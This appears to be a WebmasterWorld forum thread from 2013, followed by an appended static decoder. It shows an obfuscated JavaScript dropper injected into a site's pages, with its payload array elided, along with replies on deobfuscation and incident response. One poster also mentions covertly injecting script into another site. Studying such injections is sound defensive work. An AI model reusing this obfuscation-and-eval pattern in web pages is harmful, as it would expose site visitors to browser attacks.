WebmasterWorld JavaScript and AJAX Forum
Code hacked into our pages
Anyone have any idea what it was trying to do?
MikeNoLastName (WebmasterWorld Senior Member, 10+ Year Member)
Msg#: 4534140 posted 11:59 pm on Jan 7, 2013 (gmt 0)
Someone recently hacked into our server and inserted the following code into pretty much random locations on every .htm page on our site via some automated method. Can't see any side effects. Any idea what they were trying to do, so we can check if there was any further harm done or what to watch for?
<!--84c0a7-->
<script type="text/javascript" language="javascript" >
try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=[ LONG SEQUENCE OF TWO CHAR QUOTED NUMBER LETTER COMBINATIONS... NOT HEX CODE ];h=2;s="";if(zxc)
{for(j=0;j-456!=0;j++)
{k=j;s+=String.fromCharCode(parseInt(n[j],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}</script><!--/84c0a7-->

swa66 (WebmasterWorld Senior Member, Top Contributor of All Time, 10+ Year Member)
Msg#: 4534140 posted 12:17 am on Jan 8, 2013 (gmt 0)

That's typical obfuscated code used by hackers. In essence the script calculates z from that n and then the eval(z) attacks your visitors.

Now to know what the script tried: you'd have to deobfuscate it. Usually the easiest is to take the obfuscated script on a sacrificial machine (read: virtual machine that you copy and wipe afterwards in case it does execute too much) and replace the eval near the end with an alert and run it: it'll show what it tried to execute.

This kind of thing is not without danger: most of those will exploit the browser or some plugin, or load next stages that will eventually do that depending on the browser type and version detected.

In essence the right thing to do:
- consider all your machines that visited your website or were used to manage the content on your website as hacked till proven otherwise - note: an AV scan is no proof.
- find out how they got in (that's not in this script), it's most likely something else like SQL injection, SSH, ... if you cannot find it (hackers that know what they do wipe their traces): you're in for a lot of work as you now need a full security audit to find vulnerabilities and correct them - if you do not do this it will only come back again and again and again.
- fix security of your server to prevent future break-ins
- figure out what the script they put on every page of your site actually did
- warn visitors that you got hacked and tell them what they were subjected to (esp if you have recurring visitors)

MikeNoLastName (WebmasterWorld Senior Member, 10+ Year Member)
Msg#: 4534140 posted 4:22 am on Jan 8, 2013 (gmt 0)

Oh [bleep]!
Thanks. It looks like it crawled through all the directories automatically, sequentially over a period of about an hour. It only touched the one domain on our server as far as we can tell. They must not have been too good of hackers, as they did not reset back the times on the changed files, which is how I discovered it. Otherwise it may have been months before we discovered it.

I had a nasty virus on my computer last week which I finally got rid of with some help, but this just happened yesterday.

lucy24 (WebmasterWorld Senior Member, Top Contributor of All Time, Top Contributors Of The Month)
Msg#: 4534140 posted 8:12 am on Jan 8, 2013 (gmt 0)

for(j=0;j-456!=0;j++)

Holy ###. They couldn't just say

do
{ blah, blah }
until (heat-death of the universe)


?!

parseInt(n[j],12*2+2)

:: counting on fingers ::
base 26? Each letter is a digit?

I merrily inserted javascript into one site for almost two years before I got bored and said Here I Am. But they'd left the door standing wide open; the technique would never have worked in a normal site. (Like, say, yours or even mine. Trust me on this.)

MikeNoLastName (WebmasterWorld Senior Member, 10+ Year Member)
Msg#: 4534140 posted 8:41 am on Jan 8, 2013 (gmt 0)

I believe there were probably exactly 456 (plus or minus) items in the "LONG SEQUENCE OF TWO CHAR QUOTED NUMBER LETTER COMBINATIONS", so yeah that's the way they stepped through them up to 456. The first few terms are: "1e","3o","4d","46","3l","4c"

I was thinking the other variable names may have been a clue to the writer, but zxc and asdg are basically keyboard neighbors. Personally, I'm a UNIX C programmer (from before there was a C++) and Windows and JS, as similar as it is, are not my forte.

As far as coming back, so far so good. I was afraid they may have hidden a cron job to reset them every night at the same time or a random time (how I would have done it :), but nothing so far.

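The decoding step the thread works out by hand (swa66's "replace the eval" advice and lucy24's "base 26? each letter is a digit?"), as an added example that is not code from the thread: it recomputes the string z with parseInt(token, 26) and String.fromCharCode exactly as the dropper does, but returns it instead of eval'ing it, so the payload can be read offline without running the injected script at all. The six tokens MikeNoLastName quoted are taken from the thread; the second token array is a constructed sample, since the full 456-item array is not on the page.

```javascript
// Added example, not from the thread: a static decoder for the injected
// script's n[] array. The dropper computes parseInt(n[j], 12*2+2) (radix 26)
// and String.fromCharCode for each token, then eval()s the result. Doing the
// same arithmetic here recovers that string without executing it.

// Radix 26 uses the digits 0-9 and the letters a-p. parseInt() silently
// stops at the first invalid character (and returns NaN if there are none),
// so tokens outside that alphabet are reported rather than decoded wrongly.
function decodeBase26Tokens(tokens) {
  let text = "";
  const bad = [];
  tokens.forEach((tok, i) => {
    const code = parseInt(tok, 26);
    if (Number.isNaN(code) || !/^[0-9a-p]+$/i.test(tok)) {
      bad.push({ index: i, token: tok });
      return;
    }
    text += String.fromCharCode(code);
  });
  return { text, bad };
}

// Inverse of the above, used only to build a constructed sample below.
function encodeBase26Tokens(text) {
  return Array.from(text, (ch) =>
    ch.charCodeAt(0).toString(26).padStart(2, "0"));
}

// The first six tokens quoted in the thread ("1e" = 40 = '(', "3o" = 102 = 'f', ...).
const quotedTokens = ["1e", "3o", "4d", "46", "3l", "4c"];

// Constructed sample (not the real 456-token payload): a harmless statement
// encoded the same way the dropper encodes its script.
const sampleTokens = encodeBase26Tokens("var marker = 'decoded offline';");

if (typeof require !== "undefined" && require.main === module) {
  console.log(decodeBase26Tokens(quotedTokens).text);  // (funct
  console.log(decodeBase26Tokens(sampleTokens).text);
}
```

Decoding the six quoted tokens yields "(funct", i.e. the payload opens with a wrapped function expression, which is what eval(z) would have run in each visitor's browser.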
© Webmaster World 1996-2014 all rights reserved